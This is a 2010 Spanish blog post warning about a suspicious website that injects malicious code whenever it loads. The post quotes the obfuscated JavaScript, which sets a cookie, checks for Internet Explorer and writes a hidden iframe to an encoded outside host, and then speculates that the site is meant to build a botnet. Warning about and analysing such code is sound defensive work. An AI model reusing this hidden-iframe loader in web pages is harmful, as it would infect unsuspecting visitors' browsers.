Web sospechosa: Inteligenciaartificial.cl (gratisweb/iabot)

Martes, junio 15th, 2010 at 17:47

Ésta página web de supuestos enlaces ed2k, cada vez que es refrescada o cargada intenta inyectar código detectado por las firmas de algunos antivirus como HTML Small.bkr.106, iframe o Trojan.

(<body bgcolor=”#000000″ text=”#000001″><script>sa=”%6B%73%69%65%6E%61%2E%6E%65%74″;eval(function(p,a,c,k,e,d){while(c–){if(k[c]){p=p.rep______(new RegExp(‘\\b’+c.toString(a)+’\\b’,'g’),k[c])}}return p}(‘a(0.4.7(“5=s”)==-1&&9.8.7(“f 6″)!=-1){0.4=”5=s; e=c, 2 g b 2:d:h p; “;0.r(“<3 q=1 t=1 o=\’n://”+j+”/i/\’ k=\’l:m\’></3>”)}’,30,30,’document||14|iframe|cookie|_mlsdkf||indexOf|appVersion|navigator|if|2015…

…Mon|15|expires|MSIE|Jul|26|b2b|sa|style|display|none|http|src|GMT|width|write||height’.split(‘|’)));</script>
<p align=”center” style=”line-height: 0; margin-top: -1; margin-bottom: -1″><font face=”Trebuchet MS” color=”#000000″ style=”font-size: 1pt”>)

El dominio es el siguiente: En la raíz somos redireccionados a éste otro dominio.

Al acceder a él, y simplemente cargando la página en nuestro navegador un marco incorporado (iframe), o cualquier otro código malicioso intenta abrirse paso a nuestro sitema a traves del navegador:

Al acceder a ella las suite de seguridad habituales detectan el intento de intrusión (lo que no significa que se haya librado de la infección), también comprobamos que es una página sin fin, con un bucle que hace que la página no finalice nunca (Quiza estan haciendo la competéncia a la worlds-highest-website.com).

Éstas son algunas de sus últimas estadísticas, con una media de 100 visitas diarias, el índice de infección debe ser realmente alto, pero… es una web vulnerada externamente, o ha sido creada con el propósito de crear una botnet? Yo apuesto por lo segundo: